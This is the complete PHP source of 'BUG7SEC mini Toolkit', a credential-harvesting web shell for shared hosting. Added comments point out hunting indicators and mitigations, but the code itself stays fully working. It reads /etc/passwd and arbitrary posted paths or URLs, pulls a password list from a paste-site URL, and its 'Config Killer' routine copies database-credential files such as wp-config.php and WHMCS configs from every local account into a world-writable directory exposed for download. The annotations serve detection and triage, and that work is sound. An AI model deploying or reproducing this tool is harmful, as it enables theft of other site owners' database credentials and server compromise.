- <?php
- error_reporting(0); // Disables PHP error reporting for the whole request, so failed reads further down are not reported by PHP; when hunting for this page rely on web access logs and OS-level file auditing rather than PHP error output.
- ?><!DOCTYPE html>
- <html>
- <head>
- <title>BUG7SEC mini Toolkit © 2016</title>
- <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.12.0/jquery.min.js"></script>
- <style type="text/css">
- body{
- color: #3EF403;
- background-color: #141516;
- }
- input {
- border: dashed 1px;
- border-color: #333;
- BACKGROUND-COLOR: Black;
- font: 8pt Verdana;
- color: #0CFF37;
- }
- select {
- border: dashed 1px;
- border-color: #333;
- BACKGROUND-COLOR: Black;
- font: 8pt Verdana;
- color: #0CFF37;
- }
- textarea {
- color: #fff;
- background-color: #555;
- border-style: dashed;
- font: 9pt Monospace,'Courier New';
- border-color: lime;
- background-color: black;
- }
- ul {
- list-style-type: none;
- margin: 0;
- padding: 0;
- overflow: hidden;
- text-align:center;
- border-style: inherit;
- }
- ul li {
- float: center;
- display:inline;
- margin-left: 1px;
- }
- li a{
- color:#3EF403;
- text-decoration: none;
- }
- .container{
- margin-left: 20%;
- margin-right: 20%;
- margin-bottom: 30px;
- margin-top: 26px;
- }
- </style>
- </head>
- <body>
- <div class="container">
- <pre>
- / .'
- .---. \/ BUG7SEC mini Toolkit © 2016
- (._.' \() By Shor7cut
- ^"""^"
- </pre>
- <ul>
- <li><a href="?">-[ Home ]-</a></li>
- <li><a href="?shc=cp">-[ Cpanel Killer ]-</a></li>
- <li><a href="?shc=ck">-[ Config Killer ]-</a></li>
- </ul>
- </div>
- <?php /* Panel selector: the "shc" query parameter picks the view. No authentication or origin check appears anywhere in this listing, so any client that can reach the URL gets the same functions. */ if($_GET['shc']=="cp"){?>
- <div class="container">
- <form action="" method="post">
- <table style="width:100%">
- <tr>
- <td>Username</td>
- <td>Password</td>
- <td></td>
- </tr>
- <tr>
- <td>
- <textarea style="margin: 0px; width: 384px; height: 204px;"><?php /* $_POST['etc'] goes to file_get_contents() unvalidated; the select element below only suggests values, it does not restrict them. */ error_reporting(0); if($_POST['upass']){bug7sec::users($_POST['etc']);}?></textarea>
- </td>
- <td>
- <textarea style="margin: 0px; width: 329px; height: 204px;"><?php /* $_POST['pass'] may be a local path or a remote URL; whatever is read is echoed into the page without HTML escaping. */ error_reporting(0); if($_POST['upass']){bug7sec::pass($_POST['pass']);}?></textarea>
- </td>
- </tr>
- <tr>
- <td>
- <select name="etc">
- <option value="/etc/passwd">/etc/passwd</option>
- <option value="/etc/passwd-">/etc/passwd-</option>
- <option value="/etc//passwd.OLD">/etc//passwd.OLD</option>
- <option value="/etc/group">/etc/group</option>
- </select>
- <input name="pass" value="https://pastebin.com/raw/nG3BR2nc" placeholder=" URL Password List" required="Link Nya mas">
- </td>
- <td>
- <input name="upass" type="submit" value="Get Username & Password">
- <input name="gtpass" type="submit" value="Cpanel Cracker">
- </td>
- </tr>
- </table>
- </form>
- </div>
- <pre>
- <?php /* The "gtpass" submit field above is never read by any code in this listing. Next branch: the shc=ck panel. */
- }else if($_GET['shc']=="ck"){?>
- <div class="container">
- <center>
- <form action="" method="post">
- <input name="conkillers" type="submit" value="Config Killer">
- <input name="passkiller" type="submit" value="Get Password">
- </form>
- <?php
- if($_POST['conkillers']){ // POST field "conkillers" starts the cross-account config-file copy in bug7sec::configkiller()
- bug7sec::configkiller();
- }
- if($_POST['passkiller']){ // stub in this listing: only prints the literal "pass;"
- echo "pass;";
- }
- ?>
- </center>
- </div>
- <?php
- }else{ // default view: zone count, "#CPANEL" marker and zone names, all parsed from /etc/named.conf
- echo '<div class="container"><table style="width:100%">
- <tr>
- <td>'."-[ Domain : <font color=red>".bug7sec::countDomen()."</font> | Cpanel : <font color=red>".bug7sec::detectCPhost().'</font> ]-</td>
- </tr>
- <tr>
- <td>
- <textarea style="margin: 0px; width: 813px; height: 329px;">';
- bug7sec::domain();
- echo '</textarea>
- </td>
- </tr>
- </table></div>';
- }
- ?>
- </body>
- </html>
- <?php
- class bug7sec /*
-  * Helper class behind the "BUG7SEC mini Toolkit" page. Everything it does is a
-  * file read through file_get_contents() (/etc/passwd, /etc/named.conf, or a
-  * caller-supplied path/URL) plus, in configkiller(), copying other accounts'
-  * application config files into a directory next to the script.
-  *
-  * Indicators visible in this listing (useful for hunting and triage):
-  *  - a directory literally named "~shor7cut", created with requested mode 0777
-  *  - files "~shor7cut/<user>-wordpress.txt" and "~shor7cut/<user>-<unix time>.txt"
-  *  - "shc/.htaccess" whose first line is "#Bug7sec Team"
-  *  - requests carrying "shc=cp" / "shc=ck" and POST fields upass, etc, pass, conkillers
-  *
-  * The cross-account reads only return data where the PHP process is allowed to
-  * open other users' files; per-account PHP isolation (separate uid per site,
-  * open_basedir) and non-world-readable config files remove that precondition.
-  */
- {
- function users($url) /*
-  * Prints each capture of /(.*?):x:/ found in the file at $url, one per line;
-  * for passwd-format input that is the text in front of ":x:", i.e. the account name.
-  * $url comes straight from $_POST['etc'] in the page template, with no allow-list.
-  */
- {
- preg_match_all('/(.*?):x:/', bug7sec::fgt($url) , $match);
- foreach ($match[1] as $key => $user) {
- echo $user."\r\n";
- }
- }
- function pass($url) /*
-  * Echoes the full content read from $url. The template passes $_POST['pass'],
-  * pre-filled with a paste-site raw URL, so when remote URLs are permitted for
-  * file_get_contents() this produces an outbound fetch from the web server;
-  * a local path works just as well, which makes it a general file-read primitive.
-  */
- {
- echo bug7sec::fgt($url);
- }
- function domain(){ // prints the name of every zone "..." entry found in /etc/named.conf, one per line
- preg_match_all('/zone \"(.*?)\"/m', file_get_contents("/etc/named.conf"), $matches);
- foreach ($matches[1] as $key => $domen) {
- echo $domen."\r\n";
- }
- }
- function countDomen(){ // returns how many zone "..." entries /etc/named.conf contains
- preg_match_all('/zone \"(.*?)\"/m', file_get_contents("/etc/named.conf"), $matches);
- return count($matches[1]);
- }
- function detectCPhost(){ // returns the text after the first "#CPANEL " marker in /etc/named.conf, or a fixed placeholder string when there is none
- $re = "/#CPANEL (.*)/";
- preg_match($re, file_get_contents("/etc/named.conf"), $matches);
- if($matches[1]){
- return $matches[1];
- }else{
- return "-_- gak tau";
- }
- }
- function fgt($url){ // thin wrapper: hands $url to file_get_contents() unchanged, so it accepts whatever paths and stream wrappers the PHP configuration allows
- return file_get_contents($url);
- }
- function configkiller() /*
-  * Copies well-known application config files from every local account into
-  * the "~shor7cut" directory and prints a link to that directory.
-  * Steps, in order: (re)create the output directory, write shc/.htaccess,
-  * take account names from /etc/passwd, then try every
-  * /<base>/<user>/public_html/<config path> combination and save each non-empty read.
-  * The listed paths are the usual locations of CMS, forum, shop and billing
-  * configuration files, which commonly hold database credentials; if the
-  * output files are found on a host, treat the credentials in them as exposed.
-  */
- {
- $ckne = "~shor7cut"; // literal directory name relative to the script's working directory; PHP does not expand "~"
- rmdir($ckne);
- mkdir($ckne, 0777); // world-writable mode requested for the output directory
- $direc = array( // base directories tried as /<base>/<user>/public_html/
- 'home',
- 'home1',
- 'home2',
- 'home3',
- 'home4',
- 'home5',
- 'home6',
- 'home7',
- 'home8',
- 'home9',
- 'var/www',
- 'var/www/html',
- );
- $conkillers = array( // config-file paths, relative to each account's public_html
- "config/db.php",
- "connection/db.php",
- "wordpress/db.php",
- "db.php",
- "tomcat/conf/context.xml",
- "inc/config.php",
- "inc/koneksi.php",
- "inc/configuration.php",
- "home/config.php",
- "home/koneksi.php",
- "home/configuration.php",
- "backend/config/main-local.php",
- "app/etc/config.xml",
- "app/etc/locale.xml",
- "Configuration/Configuration.php",
- "content/configuration.php",
- "INJECTION/configuration.php",
- "xcert/configuration.php",
- "koneksi/koneksi.php",
- "perpus/koneksi.php",
- "log/koneksi.php",
- "gis/koneksi.php",
- "koneksi.php",
- "koneksi.xml",
- "lib/koneksi.php",
- "config/koneksi.php",
- "home/config/koneksi.php",
- "wp-config.php",
- "wordpress/wp-config.php",
- "docs/wp-config.php",
- "web/wp-config.php",
- "wp/wp-config.php",
- "press/wp-config.php",
- "wordpress/beta/wp-config.php",
- "news/wp-config.php",
- "new/wp-config.php",
- "blogs/wp-config.php",
- "home/wp-config.php",
- "blog/wp-config.php",
- "protal/wp-config.php",
- "site/wp-config.php",
- "main/wp-config.php",
- "test/wp-config.php",
- "wp/beta/wp-config.php",
- "beta/wp-config.php",
- "joomla/configuration.php",
- "protal/configuration.php",
- "joo/configuration.php",
- "cms/configuration.php",
- "site/configuration.php",
- "main/configuration.php",
- "news/configuration.php",
- "new/configuration.php",
- "home/configuration.php",
- "configuration.php",
- "SSI.php",
- "forum/SSI.php",
- "forum/inc/config.php",
- "forum/includes/config.php",
- "upload/includes/config.php",
- "cc/includes/config.php",
- "vb/includes/config.php",
- "vb3/includes/config.php",
- "cpanel/configuration.php",
- "panel/configuration.php",
- "ubmitticket.php",
- "manage/configuration.php",
- "myshop/configuration.php",
- "beta/configuration.php",
- "includes/config.php",
- "lib/config.php",
- "conf_global.php",
- "inc/config.php",
- "incl/config.php",
- "include/db.php",
- "include/config.php",
- "includes/functions.php",
- "includes/dist-configure.php",
- "connect.php",
- "connection.php",
- "mk_conf.php",
- "config/koneksi.php",
- "system/sistem.php",
- "config.php",
- "Settings.php",
- "settings.php",
- "sites/default/settings.php",
- "smf/Settings.php",
- "forum/Settings.php",
- "forums/Settings.php",
- "host/configuration.php",
- "hosting/configuration.php",
- "hosts/configuration.php",
- "zencart/includes/dist-configure.php",
- "shop/includes/dist-configure.php",
- "whm/configuration.php",
- "whmc/configuration.php",
- "whmcs/configuration.php",
- "whmc/WHM/configuration.php",
- "whm/WHMCS/configuration.php",
- "whm/whmcs/configuration.php",
- "order/configuration.php",
- "support/configuration.php",
- "supports/configuration.php",
- "oscommerce/includes/configure.php",
- "oscommerces/includes/configure.php",
- "shopping/includes/configure.php",
- "sale/includes/configure.php",
- "config.inc.php",
- "amember/config.inc.php",
- "clients/configuration.php",
- "client/configuration.php",
- "clientes/configuration.php",
- "cliente/configuration.php",
- "clientsupport/configuration.php",
- "billing/configuration.php",
- "billings/configuration.php",
- "admin/conf.php",
- "admin/config.php");
- if(fwrite(fopen('shc/.htaccess', 'w'), "#Bug7sec Team\r\nOptions ExecCGI Includes IncludesNOEXEC SymLinksIfOwnerMatch Indexes\r\nDirectoryIndex configs.html\r\nRequire None\r\nSatisfy Any\r\n")){ // drops an .htaccess under shc/ that, among other options, turns on Indexes (directory listing); the "#Bug7sec Team" first line is a stable string to search for
- echo "<br><font color=white>+</font> .htaccess telah terpasang<br>";
- }else{
- echo "<br><font color=red>+</font> .htaccess gagal terpasang<br>";
- }
- preg_match_all('/(.*?):x:/', bug7sec::fgt("/etc/passwd") , $match); // account names = text in front of ":x:" in /etc/passwd
- if($match[1]){
- echo "<font color=white>+</font> ".count($match[1])." users<br>";
- }else{
- echo "<font color=red>+</font> null users<br>";
- }
- foreach ($match[1] as $key => $user) { // one read attempt per user x config path x base directory: a large burst of file opens outside the script's own account, visible to OS-level file auditing
- foreach ($conkillers as $key => $patch) {
- foreach ($direc as $key => $homodir) {
- $home = "/$homodir/$user/public_html/$patch";
- $configet = bug7sec::fgt($home);
- if(!$configet==""){ // only reads that returned content are saved
- if(eregi("wp-config.php", $home)){ // the source path decides the output file name
- $db = fopen("~shor7cut/$user-wordpress.txt","w");
- fputs($db,$configet);
- }else {
- $db = fopen("~shor7cut/$user-".time().".txt","w");
- fputs($db,$configet);
- }
- }
- }
- }
- }
- echo '<font color=red>-::[</font><a href="~shor7cut" target="_blank"><font color=white size=3 face=\"comic sans ms\">Config List</font></a><font color=red>]::-</font><br>'; // the page links to the output directory, i.e. the copies are meant to be fetched over HTTP
- }
- }
- ?>